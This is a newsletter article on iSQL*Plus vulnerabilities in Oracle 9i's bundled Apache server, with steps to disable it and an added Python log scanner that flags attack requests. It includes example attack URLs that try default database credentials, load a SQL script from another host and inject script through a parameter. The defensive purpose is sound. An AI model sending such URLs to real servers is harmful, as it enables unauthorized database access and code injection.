This article originally appeared in the Oracle e-newsletter.

iSQL*Plus is a small HTML Web
interface front-end that uses SQL*Plus as the backend. It was
intended as a way of easily generating HTML reports through a Web
service using existing SQL*Plus scripts. By default,
iSQL*Plus is installed (and enabled) along with the Apache
HTTP server that comes with Oracle 9i.

Many security agencies recently reported
several vulnerabilities in this server. Depending on your
environment, you may want to disable iSQL*Plus to prevent
exploits against these vulnerabilities.

First, check to see if iSQL*Plus is
running. Try entering the URL http://<hostname>:<port>/isqlplus
…, where <hostname> is the name or IP address of the host
with Oracle 9i HTTP
server installed and <port> is the port number the server is
listening on, which is 80 by default. For example, on my Windows
machine with a fresh Oracle 9i installation, I would
enter http://127.0.0.1/isqlplus.
If you get a page with login fields, then you have iSQL*Plus
installed and running. You should consider the vulnerability issues
before allowing it to run on your machine.

The first vulnerability is a buffer overflow.
If hackers can access the main page, they can send very
long input in the username and password fields and overflow the stack,
overwriting the return address. A knowledgeable hacker can then run arbitrary code
within the security context of the Apache server, such as "SYSTEM"
under Windows or "oracle" under UNIX. Oracle has already addressed this
issue with a downloadable patch (issue number 2581911)
at OracleMetaLink. The fix for
this problem doesn't seem to be included in any default version
so far.

A second vulnerability is the fact that this
screen exists at all. It’s an opportunity for someone with access
to your Web site to test which username/password combinations are
valid on your database. For instance, I could test http://127.0.0.1/isqlplus?userid=scott/tiger
and http://127.0.0.1/isqlplus?userid=system/manager.
If I get in using a database account, I can access any table in the
database, provided I know the name.

A third vulnerability is the fact that
iSQL*Plus can open a script from a URL, which creates the
possibility of cross-site attacks. For example, if
I get a user to click on the link http://127.0.0.1/isqlplus?userid=scott/tiger&script=http://192.168.168.244/foo.pl,
my Web server, which hosts the Perl script foo.pl, can pass back
a valid SQL script to run against your database. I would also
receive all the HTTP header information from your server's
request for the document.

Another vulnerability in iSQL*Plus is
that it reflects request parameters into the JavaScript in its
page without filtering them, so arbitrary JavaScript code can be injected.
For an example from the official alert, try typing the URL http://127.0.0.1/isqlplus?action=<script>alert('This%20could%20have%20been%20a%20hacker')</script>
into a JavaScript-enabled browser. You should see an error in the page and
a pop-up alert box.

Unless you have a specific need for
iSQL*Plus, and your Web site running Oracle's Apache server
is completely secure, I recommend that you disable iSQL*Plus
and use the command line or Windows version of SQL*Plus. To disable
iSQL*Plus, you can simply comment out the following line
in the oracle_apache.conf file,
which should reside in ?/Apache/Apache/conf:

include "<oracle home>/sqlplus/admin/isqlplus.conf"

Replace <oracle home> in
this line with your actual Oracle Home directory. If you really
need to use iSQL*Plus, you should at least consider changing
the default URL path. If you search for "isqlplus" on a
search engine, you may find a couple of sites that have their
/isqlplus directory exposed. You can change the directory that is
mapped to iSQL*Plus in the isqlplus.conf file mentioned
above.
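An added example (my own, not the article's or Oracle's) that applies the points above from the defender's side: it flags access-log requests to /isqlplus that carry a user/password in the userid parameter, a remote URL in the script parameter, or a script tag in the action parameter, and it comments out the isqlplus.conf include in oracle_apache.conf text. The log lines are constructed and the function names are my own.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed combined-format access log lines; not real traffic from the article.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2003:10:00:00 +0000] "GET /isqlplus HTTP/1.1" 200 1532',
    '10.0.0.7 - - [01/Jan/2003:10:00:05 +0000] "GET /isqlplus?userid=scott/tiger HTTP/1.1" 200 2210',
    '10.0.0.7 - - [01/Jan/2003:10:00:09 +0000] "GET /isqlplus?userid=scott/tiger&script=http://192.168.168.244/foo.pl HTTP/1.1" 200 900',
    '10.0.0.9 - - [01/Jan/2003:10:01:00 +0000] "GET /isqlplus?action=%3Cscript%3Ealert(%27x%27)%3C/script%3E HTTP/1.1" 500 410',
    '10.0.0.5 - - [01/Jan/2003:10:02:00 +0000] "GET /index.html HTTP/1.1" 200 120',
]
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')  # request target between the quotes

def classify_isqlplus_request(target):
    """Return the findings for one request target; an empty list means nothing was flagged."""
    parts = urlsplit(target)
    if not parts.path.lower().startswith("/isqlplus"):
        return []
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes the values
    findings = []
    if any("/" in uid for uid in query.get("userid", [])):
        findings.append("credentials-in-url")  # user/password pair passed in the URL
    if any(re.match(r"(?i)https?://", s) for s in query.get("script", [])):
        findings.append("remote-script")  # SQL script pulled from another host
    if any("<script" in unquote(a).lower() for a in query.get("action", [])):
        findings.append("script-injection")  # script tag reflected via the action parameter
    return findings

def scan_access_log(lines):
    """Return (request_target, findings) for every log line that deserves an analyst's look."""
    hits = []
    for line in lines:
        match = REQUEST_RE.search(line)
        if not match:
            continue
        findings = classify_isqlplus_request(match.group(1))
        if findings:
            hits.append((match.group(1), findings))
    return hits

def disable_isqlplus(conf_text):
    """Comment out an active isqlplus.conf include in oracle_apache.conf text (restart the HTTP server afterwards)."""
    out = []
    for line in conf_text.splitlines():
        if re.match(r"\s*include\s+.*isqlplus\.conf", line, re.IGNORECASE):
            line = "# " + line  # already-commented lines do not match and stay as they are
        out.append(line)
    return "\n".join(out) + "\n"
```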

Scott Stephens worked for Oracle for more than 13 years in technical support, e-commerce, marketing, and software development. For more of his Oracle tips, visit our Oracle Dev Tips Library.